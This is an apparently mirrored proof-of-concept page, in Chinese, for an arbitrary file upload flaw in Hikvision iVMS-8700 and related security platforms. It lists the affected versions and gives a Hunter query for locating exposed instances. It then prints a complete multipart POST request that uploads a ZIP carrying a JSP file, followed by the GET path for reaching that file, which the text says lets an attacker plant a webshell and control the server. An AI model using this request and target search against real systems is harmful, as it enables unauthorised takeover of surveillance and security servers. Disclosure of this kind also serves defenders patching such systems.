mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-07 03:17:07 +00:00
4.3 KiB
4.3 KiB
海康威视iVMS-8700综合安防管理平台 getPic任意文件上传
一、漏洞简介
海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控、联网报警、智能分析、运维管理等多种安全防范应用系统,构建的多业务应用综合管理平台。HIKVISION iVMS-8700综合安防管理平台存在任意文件上传漏洞,攻击者通过发送特定的请求包可以上传Webshell文件控制服务器。
二、影响版本
- 海康威视综合安防系统iVMS-5000
- 海康威视综合安防系统 iVMS-8700
- 海康威视综合安防系统iVMS-5200
三、资产测绘
- hunter:
web.body="/views/home/file/installPackage.rar"||web.body="/home/locationIndex.action"
- 登录页面:
四、漏洞复现
1.生成一个压缩文件,目录结构如下。
- poc
POST /msp/home/upload.action;getPic?&type=ios HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: MicroMessenger
Content-Type: multipart/form-data; boundary=00content0boundary00
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 1288
Connection: close
--00content0boundary00
Content-Disposition: form-data; name="type"
ios
--00content0boundary00
Content-Disposition: form-data; name="file"; filename="stc.ipa"
PKz¦nWtest1/test/PKxäVM(?jùtest1/test/.DS_StoreíÁJÃ@EﺥË|Ð?eBÀµÖJ]¤M(ê:¦ÿãO4¹¥-
¡Ýµô,Î÷&y$$ófü=®¦6í`Æ{C¾î&k| Ä<îñó «ýÏmå_XîÔ_£.g£â½×ëä¡Üyåý¤¬&|X/ÿ¿ÃùÓ£òëÏÃkù)²ZÌÂ{B!v1\ßo ûÿÎé&Ú0nédk£3:§àö¶tB§´£3:§hÃûX:¡SÚÑCÑÃUëÖÿÇð !.
øÂ6,×p¶iú÷³îº±!NPK¦nWtest1/test/PetrelHD.app/PKÓ¤nW¦ëdjtest1/test/ceshi.jspÈM
Â@Ы¸)L\R« ®EOôC#af¦íõû³|ïR¥Á9n1´ÍùtÜ·us¨©v?
5ñM
Ar6}kü? vÿÿÞ×{¢ßøEÔU×PKt¦nWtest1/PK?z¦nW$test1/test/
ó¯UùÚPK?xäVM(?jù$)test1/test/.DS_Store
¹,E®ÙPK?¦nW$0Ttest1/test/PetrelHD.app/
Ð!pùÚPK?Ó¤nW¦ëdj$ test1/test/ceshi.jsp
ö¨Ë|÷ÚPK?t¦nW$ test1/
*|{NùÚPKëD
--00content0boundary00--
上传文件位置
GET /msp/upload/ios/{filename}/test1/test/ceshi.jsp HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: MicroMessenger
Connection: close
Cookie: JSESSIONID=9534BB058003BD8772529364EF5E034E
Accept-Encoding: gzip, deflate
更新: 2024-02-29 23:57:17
原文: https://www.yuque.com/xiaokp7/ocvun2/ore95852gqp60g63







